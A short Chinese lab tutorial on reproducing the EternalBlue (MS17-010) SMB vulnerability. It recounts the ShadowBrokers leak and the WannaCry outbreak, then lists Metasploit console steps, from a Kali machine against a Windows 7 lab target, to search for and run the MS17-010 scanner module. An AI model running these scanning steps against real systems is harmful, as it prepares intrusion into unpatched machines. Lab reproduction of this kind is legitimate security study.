永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
一 实验环境
攻击机:kali
靶机:win 7
二 复现步骤
1 进入msfconsole
2 查找ms17-010
search ms17-010
3 使用辅助模块进行扫描
use 3
4 查看选项
show options
5 设置目标主机IP
set rhosts 192.168.2.6
6 进行扫描
run
<